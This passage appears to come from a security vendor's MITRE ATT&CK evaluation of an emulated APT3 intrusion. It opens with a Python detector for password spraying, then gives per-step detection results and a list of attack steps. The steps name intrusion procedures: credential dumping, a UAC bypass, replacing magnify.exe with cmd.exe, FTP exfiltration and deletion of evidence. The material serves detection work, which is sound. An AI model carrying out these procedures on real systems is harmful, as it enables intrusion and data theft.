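# from the evaluation: one source tries three users against two hosts inside
# a minute and later succeeds elsewhere; a second source is one user retyping
# a password. ok=False is a failed logon, ok=True a successful one.
SAMPLE_EVENTS = [
    {"ts": "2018-10-02T14:02:01", "src": "10.0.1.5", "dst": "10.0.1.4", "user": "Kmitnick", "ok": False},
    {"ts": "2018-10-02T14:02:02", "src": "10.0.1.5", "dst": "10.0.1.4", "user": "Bob",      "ok": False},
    {"ts": "2018-10-02T14:02:03", "src": "10.0.1.5", "dst": "10.0.1.4", "user": "Frieda",   "ok": False},
    {"ts": "2018-10-02T14:02:05", "src": "10.0.1.5", "dst": "10.0.1.6", "user": "Kmitnick", "ok": False},
    {"ts": "2018-10-02T14:02:06", "src": "10.0.1.5", "dst": "10.0.1.6", "user": "Bob",      "ok": False},
    {"ts": "2018-10-02T14:02:07", "src": "10.0.1.5", "dst": "10.0.1.6", "user": "Frieda",   "ok": False},
    {"ts": "2018-10-02T14:03:30", "src": "10.0.1.5", "dst": "10.0.0.5", "user": "Kmitnick", "ok": True},
    {"ts": "2018-10-02T14:10:00", "src": "10.0.1.9", "dst": "10.0.1.4", "user": "Debbie",   "ok": False},
    {"ts": "2018-10-02T14:10:08", "src": "10.0.1.9", "dst": "10.0.1.4", "user": "Debbie",   "ok": False},
    {"ts": "2018-10-02T14:10:15", "src": "10.0.1.9", "dst": "10.0.1.4", "user": "Debbie",   "ok": True},
]


def parse_events(rows):
    """Turn the ISO timestamps into datetimes and order the records by time."""
    return sorted((dict(r, ts=datetime.fromisoformat(r["ts"])) for r in rows), key=lambda e: e["ts"])


def detect_password_spray(events, min_users=3, window=timedelta(minutes=5), follow=timedelta(hours=1)):
    """Flag each source that fails logons for at least min_users distinct users within `window`.

    Spraying is wide and shallow (many users, one or two passwords each), so
    attempts per user stay under any lockout threshold and a per-user rule
    never fires. Each finding also lists successful logons from the same
    source within `follow` of the spray: that is the case to act on first.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        failures = [e for e in evs if not e["ok"]]
        start = 0
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:   # slide the window
                start += 1
            users = {e["user"] for e in failures[start:end + 1]}
            if len(users) < min_users:
                continue
            # First qualifying window found: report every failure inside it.
            origin = failures[start]["ts"]
            span = [e for e in failures[start:] if e["ts"] - origin <= window]
            first, last = span[0]["ts"], span[-1]["ts"]
            successes = [(e["user"], e["dst"]) for e in evs
                         if e["ok"] and first <= e["ts"] <= last + follow]
            findings.append({
                "src": src,
                "users": sorted({e["user"] for e in span}),
                "targets": sorted({e["dst"] for e in span}),
                "attempts": len(span),
                "first": first,
                "last": last,
                "successes_after": successes,
            })
            break  # one finding per source
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(parse_events(SAMPLE_EVENTS)):
        print(f"{f['src']}: {f['attempts']} failures for {len(f['users'])} users "
              f"against {f['targets']} between {f['first'].time()} and {f['last'].time()}")
        for user, host in f["successes_after"]:
            print(f"  followed by a successful logon as {user} to {host}")
```

The thresholds are deliberately parameters: three users in five minutes fits a lab of this size, while a production domain needs a higher user count and a per-source baseline so that a jump host or a scanner does not page someone every hour. The follow-up success check is what turns a noisy spray finding into the 16.B.1 lateral movement that actually happened.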
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert of net.exe execution with correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Valid Accounts
(T1078)
Enrichment (Tainted)
  
 
The capability enriched a logon attempt via net.exe, using the valid credentials of user Kmitnick, with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of a logon attempt via net.exe using the valid credentials of user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Brute Force
(T1110)
Enrichment (Tainted)
  
 
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe conducting suspicious activity (tainted by a parent PowerShell alert)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert of net.exe execution with correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Process tree showing alert net.exe execution (tainted by a parent PowerShell alert)
Valid Accounts
(T1078)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe conducting suspicious activity (tainted by a parent PowerShell alert)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file write of autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing file write of autoupdate.vbs (tainted by a parent PowerShell alert, listed as Owner process)
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing autoupdate.vbs through wscript.exe. The telemetry was tainted by a parent PowerShell alert based on a malicious Invoke-RunAs command.
Telemetry showing cmd.exe executing autoupdate.vbs through wscript.exe (tainted by a parent PowerShell alert)
Parent alert on Malicious PowerShell Command (Invoke-RunAs)
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed file events for the write of update.vbs to Creeper (10.0.0.4). The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry of file events for write of update.vbs to Creeper (10.0.0.4) (tainted by a parent PowerShell alert, listed as Owner process)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe execution with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry of sc.exe executing with command-line arguments (tainted by a parent PowerShell alert)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for the unconventional creation of a new service with the correct ATT&CK Technique (New Service) and Tactic (Persistence, Privilege Escalation). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed sc.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for unconventional new service with correct ATT&CK Technique (New Service) and Tactics (Persistence, Privilege Escalation) (tainted by a parent PowerShell alert)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing sc.exe executing with command-line arguments (tainted by a parent PowerShell alert)
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed sc.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing sc.exe executing with command-line arguments (tainted by a parent PowerShell alert)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing the update.vbs from the Adobe Flash Updater service. Telemetry also showed sc.exe executing the service. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing cmd.exe executing update.vbs
Telemetry showing sc.exe executing the service (tainted by a parent PowerShell alert)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services were enabled. The telemetry was tainted by a parent PowerShell alert.
Telemetry of reg.exe executing with command-line arguments (tainted by a parent PowerShell alert)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry of reg.exe executing with command-line arguments (tainted by a parent PowerShell alert)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for takeown.exe performing activity related to swapping an accessibility features binary. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed takeown.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for takeown.exe performing activity related to swapping an accessibility features binary (tainted by a parent PowerShell alert)
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed icacls.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing icacls.exe executing with command-line arguments (tainted by a parent PowerShell alert)
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry (Tainted)
  
 
Telemetry showed creation and file write events for magnify.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing creation and write events for magnify.exe (tainted by a parent PowerShell alert, listed as Owner process)
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry (Tainted)
  
 
Telemetry showed creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry of file create/write of vsdx (tainted by a parent PowerShell alert, listed as Owner process)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed that recycler.exe was WinRAR via file metadata. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe identified as WinRAR via file metadata (tainted by a parent PowerShell alert)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed the file creation of recycler.exe by powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing file create/write of recycler.exe (tainted by a parent PowerShell alert, listed as Owner process)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe execution (tainted by a parent PowerShell alert)
Data Encrypted
(T1022)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe execution (tainted by a parent PowerShell alert)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing recycler.exe execution (tainted by a parent PowerShell alert)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Enrichment (Tainted)
  
 
The capability enriched ftp.exe execution with a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed the execution of ftp.exe with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of ftp.exe execution in process tree with related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol) (tainted by a parent PowerShell alert)
Continuation of enrichment of ftp.exe execution in process tree showing command-line arguments
Enrichment of ftp.exe execution with related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol) (tainted by a parent PowerShell alert)
Continuation of enrichment of ftp.exe execution showing total number of bytes transmitted
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry (Tainted)
  
 
Telemetry showed a deletion event for old.rar via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing a deletion event for old.rar via powershell.exe (tainted by a parent PowerShell alert, listed as Owner process)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Telemetry (Tainted)
  
 
Telemetry showed a deletion event for recycler.exe via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process.
Telemetry showing a deletion event for recycler.exe via powershell.exe (tainted by a parent PowerShell alert, listed as Owner process)
20.A.1
magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Specific Behavior
  
A Specific Behavior alert was generated based on a new process masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features).
Telemetry
  
Telemetry showed the execution of magnify.exe. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for magnify.exe masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features)
Specific Behavior alert for magnify.exe, in process tree, masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features)
Remote Desktop Protocol
(T1076)
Enrichment
  
The capability enriched an RDP connection with information that the connection was made to an RDP port, as well as a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol).
Telemetry
  
Telemetry showed creation of an RDP session on Creeper (10.0.0.4).
Enrichment of RDP connection to Creeper (10.0.0.4) identified as using RDP Port and related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol)
Telemetry of connection to port 3389 on Creeper (10.0.0.4)
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated based on whoami.exe performing Reconnaissance as a SYSTEM user. The alert was tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The alert was tainted by a parent Accessibility Features alert.
Telemetry
  
Telemetry showed the execution of whoami.exe. For most alerts in the user interface, the telemetry behind them is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for whoami.exe execution with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery) (tainted by a parent Accessibility Features alert)

Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discovery

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discovery

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts, Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

